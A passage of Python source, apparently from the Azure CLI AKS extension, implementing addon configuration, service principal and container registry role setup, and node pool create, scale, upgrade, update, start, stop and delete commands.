if 'kube-dashboard' in addons:
addon_profiles[CONST_KUBE_DASHBOARD_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('kube-dashboard')
# TODO: can we help the user find a workspace resource ID?
if 'monitoring' in addons:
if not workspace_resource_id:
# use default workspace if exists else create default workspace
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd, subscription_id, resource_group_name)
workspace_resource_id = sanitize_loganalytics_ws_resource_id(workspace_resource_id)
addon_profiles[CONST_MONITORING_ADDON_NAME] = ManagedClusterAddonProfile(enabled=True,
config={CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID: workspace_resource_id,
CONST_MONITORING_USING_AAD_MSI_AUTH: enable_msi_auth_for_monitoring})
addons.remove('monitoring')
elif workspace_resource_id:
raise CLIError(
'"--workspace-resource-id" requires "--enable-addons monitoring".')
if 'azure-policy' in addons:
addon_profiles[CONST_AZURE_POLICY_ADDON_NAME] = ManagedClusterAddonProfile(
enabled=True)
addons.remove('azure-policy')
if 'gitops' in addons:
addon_profiles['gitops'] = ManagedClusterAddonProfile(enabled=True)
addons.remove('gitops')
if 'ingress-appgw' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME] = addon_profile
addons.remove('ingress-appgw')
if 'open-service-mesh' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={})
addon_profiles[CONST_OPEN_SERVICE_MESH_ADDON_NAME] = addon_profile
addons.remove('open-service-mesh')
if 'azure-keyvault-secrets-provider' in addons:
addon_profile = ManagedClusterAddonProfile(enabled=True, config={CONST_SECRET_ROTATION_ENABLED: "false", CONST_ROTATION_POLL_INTERVAL: "2m"})
if enable_secret_rotation:
addon_profile.config[CONST_SECRET_ROTATION_ENABLED] = "true"
if rotation_poll_interval is not None:
addon_profile.config[CONST_ROTATION_POLL_INTERVAL] = rotation_poll_interval
addon_profiles[CONST_AZURE_KEYVAULT_SECRETS_PROVIDER_ADDON_NAME] = addon_profile
addons.remove('azure-keyvault-secrets-provider')
if 'confcom' in addons:
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={CONST_ACC_SGX_QUOTE_HELPER_ENABLED: "false"})
if enable_sgxquotehelper:
addon_profile.config[CONST_ACC_SGX_QUOTE_HELPER_ENABLED] = "true"
addon_profiles[CONST_CONFCOM_ADDON_NAME] = addon_profile
addons.remove('confcom')
if 'virtual-node' in addons:
if not aci_subnet_name or not vnet_subnet_id:
raise CLIError(
'"--enable-addons virtual-node" requires "--aci-subnet-name" and "--vnet-subnet-id".')
# TODO: how about aciConnectorwindows, what is its addon name?
os_type = 'Linux'
addon_profiles[CONST_VIRTUAL_NODE_ADDON_NAME + os_type] = ManagedClusterAddonProfile(
enabled=True,
config={CONST_VIRTUAL_NODE_SUBNET_NAME: aci_subnet_name}
)
addons.remove('virtual-node')
# error out if any (unrecognized) addons remain
if addons:
raise CLIError('"{}" {} not recognized by the --enable-addons argument.'.format(
",".join(addons), "are" if len(addons) > 1 else "is"))
return addon_profiles
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
fqdn_subdomain=None,
location=None,
name=None):
file_name_aks = 'aksServicePrincipal.json'
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, try to load it from local disk
principal_obj = load_acs_service_principal(
subscription_id, file_name=file_name_aks)
if principal_obj:
service_principal = principal_obj.get('service_principal')
client_secret = principal_obj.get('client_secret')
else:
# Nothing to load, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
if dns_name_prefix:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
else:
url = 'http://{}.{}.{}.cloudapp.azure.com'.format(
salt, fqdn_subdomain, location)
service_principal = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
# --service-principal specfied, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
store_acs_service_principal(
subscription_id, client_secret, service_principal, file_name=file_name_aks)
return load_acs_service_principal(subscription_id, file_name=file_name_aks)
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
'Please specify both min-count and max-count when --enable-cluster-autoscaler enabled')
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
'min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _create_client_secret():
# Add a special character to satsify AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _ensure_aks_acr(cli_ctx,
client_id,
acr_name_or_id,
subscription_id, # pylint: disable=unused-argument
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cli_ctx, client_id, registry.id, detach)
return
# Check if the ACR exists by name accross all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cli_ctx, client_id, registry.id, detach)
return
def _ensure_aks_acr_role_assignment(cli_ctx,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not add_role_assignment(cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def aks_agentpool_show(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, # pylint: disable=unused-argument,too-many-locals
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
kubernetes_version=None,
node_zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
os_type=None,
os_sku=None,
enable_fips_image=False,
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
scale_down_mode=CONST_SCALE_DOWN_MODE_DELETE,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
labels=None,
max_surge=None,
mode="User",
aks_custom_headers=None,
kubelet_config=None,
linux_os_config=None,
enable_encryption_at_host=False,
enable_ultra_ssd=False,
workload_runtime=None,
gpu_instance_profile=None,
snapshot_id=None,
no_wait=False):
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
creationData = None
if snapshot_id:
snapshot = _get_snapshot(cmd.cli_ctx, snapshot_id)
if not kubernetes_version:
kubernetes_version = snapshot.kubernetes_version
if not os_type:
os_type = snapshot.os_type
if not os_sku:
os_sku = snapshot.os_sku
if not node_vm_size:
node_vm_size = snapshot.vm_size
creationData = CreationData(
source_resource_id=snapshot_id
)
if not os_type:
os_type = "Linux"
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type == "Windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
os_sku=os_sku,
enable_fips=enable_fips_image,
storage_profile=ContainerServiceStorageProfileTypes.managed_disks,
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
node_taints=taints_array,
scale_set_priority=priority,
scale_down_mode=scale_down_mode,
upgrade_settings=upgradeSettings,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
mode=mode,
workload_runtime=workload_runtime,
gpu_instance_profile=gpu_instance_profile,
creation_data=creationData
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
if kubelet_config:
agent_pool.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool.linux_os_config = _get_linux_os_config(linux_os_config)
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, agent_pool, headers=headers)
def aks_agentpool_scale(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_upgrade(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
kubernetes_version='',
no_wait=False,
node_image_only=False,
max_surge=None,
aks_custom_headers=None,
snapshot_id=None):
if kubernetes_version != '' and node_image_only:
raise CLIError('Conflicting flags. Upgrading the Kubernetes version will also upgrade node image version.'
'If you only want to upgrade the node version please use the "--node-image-only" option only.')
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name,
snapshot_id)
creationData = None
if snapshot_id:
snapshot = _get_snapshot(cmd.cli_ctx, snapshot_id)
if not kubernetes_version and not node_image_only:
kubernetes_version = snapshot.kubernetes_version
creationData = CreationData(
source_resource_id=snapshot_id
)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
instance.creation_data = creationData
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_get_upgrade_profile(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_update(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
tags=None,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
scale_down_mode=None,
min_count=None, max_count=None,
max_surge=None,
mode=None,
labels=None,
node_taints=None,
no_wait=False):
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
if (update_autoscaler != 1 and not tags and not scale_down_mode and not mode and not max_surge and labels is None and node_taints is None):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge" or "--scale-down-mode" or "--labels" or "--node-taints')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
if node_taints is not None:
taints_array = []
if node_taints != '':
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise InvalidArgumentValueError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
instance.node_taints = taints_array
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning(
'Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if scale_down_mode is not None:
instance.scale_down_mode = scale_down_mode
if mode is not None:
instance.mode = mode
if labels is not None:
instance.node_labels = labels
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance)
def aks_agentpool_stop(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
aks_custom_headers=None,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise InvalidArgumentValueError(
"Node pool {} doesnt exist, use 'aks nodepool list' to get current node pool list".format(nodepool_name))
instance = client.get(resource_group_name, cluster_name, nodepool_name)
power_state = PowerState(code="Stopped")
instance.power_state = power_state
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_start(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
aks_custom_headers=None,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise InvalidArgumentValueError(
"Node pool {} doesnt exist, use 'aks nodepool list' to get current node pool list".format(nodepool_name))
instance = client.get(resource_group_name, cluster_name, nodepool_name)
power_state = PowerState(code="Running")
instance.power_state = power_state
headers = get_aks_custom_headers(aks_custom_headers)
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, cluster_name, nodepool_name, instance, headers=headers)
def aks_agentpool_delete(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name)
def aks_addon_list_available():
available_addons = []
for k, v in ADDONS.items():
available_addons.append({
"name": k,
"description": ADDONS_DESCRIPTIONS[v]
})
return available_addons
def aks_addon_list(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
addon_profiles = client.get(resource_group_name, name).addon_profiles
current_addons = []
for name, addon in ADDONS.items():
if not addon_profiles or addon not in addon_profiles:
current_addons.append({
"name": name,
"api_key": addon,
"enabled": False
})
else:
current_addons.append({
"name": name,
"api_key": addon,
"enabled": addon_profiles[addon].enabled
})
return current_addons
def aks_addon_show(cmd, client, resource_group_name, name, addon): # pylint: disable=unused-argument
addon_profiles = client.get(resource_group_name, name).addon_profiles
addon_key = ADDONS[addon]
if not addon_profiles or addon_key not in addon_profiles or not addon_profiles[addon_key].enabled:
raise CLIError(f'Addon "{addon}" is not enabled in this cluster.')
return {
"name": addon,
"api_key": addon_key,
"config": addon_profiles[addon_key].config,
"identity": addon_profiles[addon_key].identity
}
def aks_addon_enable(cmd, client, resource_group_name, name, addon, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None,
no_wait=False, enable_msi_auth_for_monitoring=False):
return enable_addons(cmd, client, resource_group_name, name, addon, workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name, appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix,
appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace, enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring)
def aks_addon_disable(cmd, client, resource_group_name, name, addon, no_wait=False):
return aks_disable_addons(cmd, client, resource_group_name, name, addon, no_wait)
def aks_addon_update(cmd, client, resource_group_name, name, addon, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None,
no_wait=False, enable_msi_auth_for_monitoring=False):
addon_profiles = client.get(resource_group_name, name).addon_profiles
addon_key = ADDONS[addon]
if not addon_profiles or addon_key not in addon_profiles or not addon_profiles[addon_key].enabled:
raise CLIError(f'Addon "{addon}" is not enabled in this cluster.')
return enable_addons(cmd, client, resource_group_name, name, addon, check_enabled=False,
workspace_resource_id=workspace_resource_id,
subnet_name=subnet_name, appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix,
appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id,
appgw_watch_namespace=appgw_watch_namespace, enable_sgxquotehelper=enable_sgxquotehelper,
enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait,
enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring)
def aks_disable_addons(cmd, client, resource_group_name, name, addons, no_wait=False):
instance = client.get(resource_group_name, name)
subscription_id = get_subscription_id(cmd.cli_ctx)
try:
if addons == "monitoring" and CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled and \
CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
# remove the DCR association because otherwise the DCR can't be deleted
ensure_container_insights_for_monitoring(
cmd,
instance.addon_profiles[CONST_MONITORING_ADDON_NAME],
subscription_id,
resource_group_name,
name,
instance.location,
remove_monitoring=True,
aad_route=True,
create_dcr=False,
create_dcra=True
)
except TypeError:
pass
instance = _update_addons(
cmd,
instance,
subscription_id,
resource_group_name,
name,
addons,
enable=False,
no_wait=no_wait
)
# send the managed cluster representation to update the addon profiles
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, name, instance)
def aks_enable_addons(cmd, client, resource_group_name, name, addons, workspace_resource_id=None,
subnet_name=None, appgw_name=None, appgw_subnet_prefix=None, appgw_subnet_cidr=None, appgw_id=None, appgw_subnet_id=None,
appgw_watch_namespace=None, enable_sgxquotehelper=False, enable_secret_rotation=False, rotation_poll_interval=None, no_wait=False, enable_msi_auth_for_monitoring=False):
instance = client.get(resource_group_name, name)
msi_auth = True if instance.service_principal_profile.client_id == "msi" else False # this is overwritten by _update_addons(), so the value needs to be recorded here
subscription_id = get_subscription_id(cmd.cli_ctx)
instance = _update_addons(cmd, instance, subscription_id, resource_group_name, name, addons, enable=True,
workspace_resource_id=workspace_resource_id, enable_msi_auth_for_monitoring=enable_msi_auth_for_monitoring, subnet_name=subnet_name,
appgw_name=appgw_name, appgw_subnet_prefix=appgw_subnet_prefix, appgw_subnet_cidr=appgw_subnet_cidr, appgw_id=appgw_id, appgw_subnet_id=appgw_subnet_id, appgw_watch_namespace=appgw_watch_namespace,
enable_sgxquotehelper=enable_sgxquotehelper, enable_secret_rotation=enable_secret_rotation, rotation_poll_interval=rotation_poll_interval, no_wait=no_wait)
if CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled:
if CONST_MONITORING_USING_AAD_MSI_AUTH in instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config and \
str(instance.addon_profiles[CONST_MONITORING_ADDON_NAME].config[CONST_MONITORING_USING_AAD_MSI_AUTH]).lower() == 'true':
if not msi_auth:
raise ArgumentUsageError("--enable-msi-auth-for-monitoring can not be used on clusters with service principal auth.")
else:
# create a Data Collection Rule (DCR) and associate it with the cluster
ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=True, create_dcr=True, create_dcra=True)
else:
# monitoring addon will use legacy path
ensure_container_insights_for_monitoring(cmd, instance.addon_profiles[CONST_MONITORING_ADDON_NAME], subscription_id, resource_group_name, name, instance.location, aad_route=False)
monitoring = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and instance.addon_profiles[
CONST_INGRESS_APPGW_ADDON_NAME].enabled
os_type = 'Linux'
enable_virtual_node = False
if CONST_VIRTUAL_NODE_ADDON_NAME + os_type in instance.addon_profiles:
enable_virtual_node = True
need_post_creation_role_assignment = monitoring or ingress_appgw_addon_enabled or enable_virtual_node
if need_post_creation_role_assignment:
# adding a wait here since we rely on the result for role assignment
result = LongRunningOperation(cmd.cli_ctx)(
client.begin_create_or_update(resource_group_name, name, instance))
cloud_name = cmd.cli_ctx.cloud.name
# mdm metrics supported only in Azure Public cloud so add the role assignment only in this cloud
if monitoring and cloud_name.lower() == 'azurecloud':
from msrestazure.tools import resource_id
cluster_resource_id = resource_id(
subscription=subscription_id,
resource_group=resource_group_name,
namespace='Microsoft.ContainerService', type='managedClusters',
name=name
)
add_monitoring_role_assignment(result, cluster_resource_id, cmd)
if ingress_appgw_addon_enabled:
add_ingress_appgw_addon_role_assignment(result, cmd)
if enable_virtual_node:
# All agent pool will reside in the same vnet, we will grant vnet level Contributor role
# in later function, so using a random agent pool here is OK
random_agent_pool = result.agent_pool_profiles[0]
if random_agent_pool.vnet_subnet_id != "":
add_virtual_node_role_assignment(
cmd, result, random_agent_pool.vnet_subnet_id)
# Else, the cluster is not using custom VNet, the permission is already granted in AKS RP,
# we don't need to handle it in client side in this case.
else:
result = sdk_no_wait(no_wait, client.begin_create_or_update,
resource_group_name, name, instance)
return result
def aks_rotate_certs(cmd, client, resource_group_name, name, no_wait=True): # pylint: disable=unused-argument
return sdk_no_wait(no_wait, client.begin_rotate_cluster_certificates, resource_group_name, name)
def _update_addons(cmd, # pylint: disable=too-many-branches,too-many-statements
instance,
subscription_id,
resource_group_name,
name,
addons,
enable,
workspace_resource_id=None,
enable_msi_auth_for_monitoring=False,
subnet_name=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_sgxquotehelper=False,
enable_secret_rotation=False,
disable_secret_rotation=False,
rotation_poll_interval=None,
no_wait=False): # pylint: disable=unused-argument
# parse the comma-separated addons argument
addon_args = addons.split(',')
addon_profiles = instance.addon_profiles or {}
os_type = 'Linux'
# for each addons argument
for addon_arg in addon_args:
if addon_arg not in ADDONS:
raise CLIError("Invalid addon name: {}.".format(addon_arg))
addon = ADDONS[addon_arg]
if addon == CONST_VIRTUAL_NODE_ADDON_NAME:
# only linux is supported for now, in the future this will be a user flag
addon += os_type
# honor addon names defined in Azure CLI
for key in list(addon_profiles):
if key.lower() == addon.lower() and key != addon:
addon_profiles[addon] = addon_profiles.pop(key)
if enable:
# add new addons or update existing ones and enable them
addon_profile = addon_profiles.get(
addon, ManagedClusterAddonProfile(enabled=False))
# special config handling for certain addons
if addon == CONST_MONITORING_ADDON_NAME:
logAnalyticsConstName = CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID
if addon_profile.enabled:
raise CLIError('The monitoring addon is already enabled for this managed cluster.\n'
'To change monitoring configuration, run "az aks disable-addons -a monitoring"'
'before enabling it again.')
if not workspace_resource_id:
workspace_resource_id = ensure_default_log_analytics_workspace_for_monitoring(
cmd,
subscription_id,
resource_group_name)
workspace_resource_id = sanitize_loganalytics_ws_resource_id(workspace_resource_id)
addon_profile.config = {logAnalyticsConstName: workspace_resource_id}
addon_profile.config[CONST_MONITORING_USING_AAD_MSI_AUTH] = enable_msi_auth_for_monitoring
elif addon == (CONST_VIRTUAL_NODE_ADDON_NAME + os_type):
if addon_profile.enabled:
raise CLIError('The virtual-node addon is already enabled for this managed cluster.\n'
'To change virtual-node configuration, run '
'"az aks disable-addons -a virtual-node -g {resource_group_name}" '
'before enabling it again.')
if not subnet_name:
raise CLIError(
'The aci-connector addon requires setting a subnet name.')
addon_profile.config = {
CONST_VIRTUAL_NODE_SUBNET_NAME: subnet_name}
elif addon == CONST_INGRESS_APPGW_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The ingress-appgw addon is already enabled for this managed cluster.\n'
'To change ingress-appgw configuration, run '
f'"az aks disable-addons -a ingress-appgw -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
if appgw_name is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_NAME] = appgw_name
if appgw_subnet_prefix is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_prefix
if appgw_subnet_cidr is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_CIDR] = appgw_subnet_cidr
if appgw_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID] = appgw_id
if appgw_subnet_id is not None:
addon_profile.config[CONST_INGRESS_APPGW_SUBNET_ID] = appgw_subnet_id
if appgw_watch_namespace is not None:
addon_profile.config[CONST_INGRESS_APPGW_WATCH_NAMESPACE] = appgw_watch_namespace
elif addon == CONST_OPEN_SERVICE_MESH_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The open-service-mesh addon is already enabled for this managed cluster.\n'
'To change open-service-mesh configuration, run '
f'"az aks disable-addons -a open-service-mesh -n {name} -g {resource_group_name}" '
'before enabling it again.')
addon_profile = ManagedClusterAddonProfile(
enabled=True, config={})
elif addon == CONST_CONFCOM_ADDON_NAME:
if addon_profile.enabled:
raise CLIError('The confcom addon is already enabled for this managed cluster.\n'
